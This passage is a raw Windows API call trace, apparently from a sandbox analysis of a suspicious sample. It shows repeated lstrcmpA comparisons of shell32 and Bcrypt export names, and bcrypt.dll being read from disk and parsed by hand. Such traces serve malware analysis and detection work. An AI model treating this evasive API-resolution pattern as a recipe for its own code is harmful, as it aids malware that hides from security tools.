(lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0137.281] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLW") returned 1 [0137.281] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0137.281] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0137.281] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0137.281] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0137.281] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0137.281] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0137.281] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 0 [0137.281] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AppCompat_RunDLLW") returned 1 [0137.281] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocCreateForClasses") returned 1 [0137.281] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocGetDetailsOfPropKey") returned 1 [0137.281] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CDefFolderMenu_Create2") returned 1 [0137.281] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CIDLData_CreateFromIDArray") returned 1 [0137.281] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0137.281] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CheckEscapesW") returned 1 [0137.281] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CommandLineToArgvW") returned 1 [0137.281] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLL") returned 1 [0137.281] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLA") returned 1 [0137.281] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLAsUserW") returned 1 [0137.281] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLW") returned 1 [0137.281] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0137.281] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0137.281] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0137.281] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0137.281] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0137.281] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0137.281] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0137.281] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="DAD_AutoScroll") returned 0 [0137.282] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AppCompat_RunDLLW") returned 1 [0137.282] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocCreateForClasses") returned 1 [0137.282] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocGetDetailsOfPropKey") returned 1 [0137.282] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CDefFolderMenu_Create2") returned 1 [0137.282] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CIDLData_CreateFromIDArray") returned 1 [0137.282] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0137.282] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CheckEscapesW") returned 1 [0137.282] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CommandLineToArgvW") returned 1 [0137.282] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLL") returned 1 [0137.282] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLA") returned 1 [0137.282] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLAsUserW") returned 1 [0137.282] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLW") returned 1 [0137.282] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0137.282] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0137.282] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0137.282] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0137.282] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0137.282] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0137.282] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0137.282] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_AutoScroll") returned 1 [0137.282] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_DragEnterEx") returned 0 [0137.282] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AppCompat_RunDLLW") returned 1 [0137.282] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocCreateForClasses") returned 1 [0137.282] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0137.282] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CDefFolderMenu_Create2") returned 1 [0137.282] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CIDLData_CreateFromIDArray") returned 1 [0137.282] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0137.282] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CheckEscapesW") returned 1 [0137.282] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CommandLineToArgvW") returned 1 [0137.282] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLL") returned 1 [0137.282] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLA") returned 1 [0137.282] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLAsUserW") returned 1 [0137.283] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLW") returned 1 [0137.283] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0137.283] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0137.283] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0137.283] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0137.283] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0137.283] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0137.498] GetProcessHeap () returned 0x430000 [0137.498] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4122040 | out: hHeap=0x430000) returned 1 [0138.044] GetProcessHeap () returned 0x430000 [0138.044] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x4491a0 [0138.045] LoadLibraryA (lpLibFileName="Bcrypt.dll") returned 0x7ffc5bcc0000 [0138.052] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0138.052] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0138.052] GetModuleFileNameA (in: hModule=0x7ffc5bcc0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0138.052] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0138.052] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0138.052] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0138.052] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=159648) returned 1 [0138.052] GetProcessHeap () returned 0x430000 [0138.052] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x26fa0) returned 0x2d62010 [0138.054] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0138.054] ReadFile (in: hFile=0x15c, lpBuffer=0x2d62010, nNumberOfBytesToRead=0x26fa0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d62010*, lpNumberOfBytesRead=0x14f5a4*=0x26fa0, lpOverlapped=0x0) returned 1 [0138.862] CloseHandle (hObject=0x15c) returned 1 [0138.863] lstrcmpA (lpString1="BCryptAddContextFunction", lpString2="BCryptAddContextFunction") returned 0 [0138.863] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunction") returned 1 [0138.863] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunctionProvider") returned 0 [0138.863] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunction") returned 1 [0138.863] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunctionProvider") returned 1 [0138.863] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptCloseAlgorithmProvider") returned 0 [0138.863] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunction") returned 1 [0138.863] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0138.863] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0138.863] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptConfigureContext") returned 0 [0138.863] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunction") returned 1 [0138.863] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunctionProvider") returned 1 [0138.863] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0138.863] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContext") returned 1 [0138.863] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContextFunction") returned 0 [0138.863] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunction") returned 1 [0138.863] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0138.863] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0138.863] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContext") returned 1 [0138.863] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContextFunction") returned 1 [0138.863] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCreateContext") returned 0 [0138.863] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunction") returned 1 [0138.864] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0138.864] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0138.864] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContext") returned 1 [0138.864] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0138.864] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateContext") returned 1 [0138.864] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateHash") returned 0 [0138.864] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunction") returned 1 [0138.864] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0138.864] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0138.864] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContext") returned 1 [0138.864] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContextFunction") returned 1 [0138.864] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateContext") returned 1 [0138.864] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateHash") returned 1 [0138.864] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateMultiHash") returned 0 [0138.864] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunction") returned 1 [0138.864] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0138.864] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0138.864] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContext") returned 1 [0138.864] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0138.864] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateContext") returned 1 [0138.864] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateHash") returned 1 [0138.864] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateMultiHash") returned 1 [0138.864] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptDecrypt") returned 0 [0138.865] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunction") returned 1 [0138.865] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0138.865] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0138.865] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContext") returned 1 [0138.865] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContextFunction") returned 1 [0138.865] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateContext") returned 1 [0138.865] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateHash") returned 1 [0138.865] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateMultiHash") returned 1 [0138.865] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDecrypt") returned 1 [0138.865] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDeleteContext") returned 0 [0138.865] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunction") returned 1 [0138.865] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0138.865] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0138.865] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContext") returned 1 [0138.865] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContextFunction") returned 1 [0138.865] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateContext") returned 1 [0138.865] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateHash") returned 1 [0138.865] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateMultiHash") returned 1 [0138.865] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDecrypt") returned 1 [0138.865] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeleteContext") returned 1 [0138.865] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeriveKey") returned 0 [0138.865] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunction") returned 1 [0138.865] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunctionProvider") returned 1 [0138.865] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0138.865] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContext") returned 1 [0138.866] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContextFunction") returned 1 [0138.866] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateContext") returned 1 [0138.866] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateHash") returned 1 [0138.866] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateMultiHash") returned 1 [0138.866] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDecrypt") returned 1 [0138.866] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeleteContext") returned 1 [0138.866] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKey") returned 1 [0138.866] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKeyCapi") returned 0 [0138.866] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunction") returned 1 [0138.866] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunctionProvider") returned 1 [0138.866] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0138.866] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContext") returned 1 [0138.866] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContextFunction") returned 1 [0138.866] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateContext") returned 1 [0138.866] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateHash") returned 1 [0138.866] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateMultiHash") returned 1 [0138.866] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDecrypt") returned 1 [0138.866] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeleteContext") returned 1 [0138.866] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKey") returned 1 [0138.866] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyCapi") returned 1 [0138.866] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyPBKDF2") returned 0 [0138.866] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunction") returned 1 [0138.866] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0138.866] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0138.866] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContext") returned 1 [0138.866] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContextFunction") returned 1 [0138.867] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateContext") returned 1 [0138.867] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateHash") returned 1 [0138.867] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateMultiHash") returned 1 [0138.867] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDecrypt") returned 1 [0138.867] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeleteContext") returned 1 [0138.867] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKey") returned 1 [0138.867] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0138.867] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0138.867] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDestroyHash") returned 0 [0138.867] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunction") returned 1 [0138.867] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0138.867] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0138.867] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContext") returned 1 [0138.867] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContextFunction") returned 1 [0138.867] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateContext") returned 1 [0138.867] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateHash") returned 1 [0138.867] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateMultiHash") returned 1 [0138.867] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDecrypt") returned 1 [0138.867] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeleteContext") returned 1 [0138.867] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKey") returned 1 [0138.867] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0138.867] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0138.867] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyHash") returned 1 [0138.868] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyKey") returned 0 [0138.868] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunction") returned 1 [0138.868] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunctionProvider") returned 1 [0138.868] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0138.868] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContext") returned 1 [0138.868] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContextFunction") returned 1 [0138.868] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateContext") returned 1 [0138.868] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateHash") returned 1 [0138.868] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateMultiHash") returned 1 [0138.868] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDecrypt") returned 1 [0138.868] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeleteContext") returned 1 [0138.868] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKey") returned 1 [0138.868] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyCapi") returned 1 [0138.868] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0138.868] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyHash") returned 1 [0138.868] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyKey") returned 1 [0138.868] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroySecret") returned 0 [0138.868] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunction") returned 1 [0138.868] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0138.868] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0138.868] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContext") returned 1 [0138.868] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0138.869] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateContext") returned 1 [0138.869] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateHash") returned 1 [0138.869] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateMultiHash") returned 1 [0138.869] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDecrypt") returned 1 [0138.869] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeleteContext") returned 1 [0138.869] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKey") returned 1 [0138.869] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0138.869] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0138.869] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyHash") returned 1 [0138.869] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyKey") returned 1 [0138.869] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroySecret") returned 1 [0138.869] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDuplicateHash") returned 0 [0138.869] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunction") returned 1 [0138.869] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0138.869] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0138.869] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContext") returned 1 [0138.869] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContextFunction") returned 1 [0138.869] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateContext") returned 1 [0138.869] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateHash") returned 1 [0138.869] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateMultiHash") returned 1 [0138.869] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDecrypt") returned 1 [0138.869] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeleteContext") returned 1 [0138.869] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKey") returned 1 [0138.869] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0138.869] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0138.869] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyHash") returned 1 [0138.870] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyKey") returned 1 [0138.870] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroySecret") returned 1 [0138.870] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateHash") returned 1 [0138.870] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateKey") returned 0 [0138.870] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunction") returned 1 [0138.870] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0138.870] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0138.870] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContext") returned 1 [0138.870] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0138.870] lstrcmpA 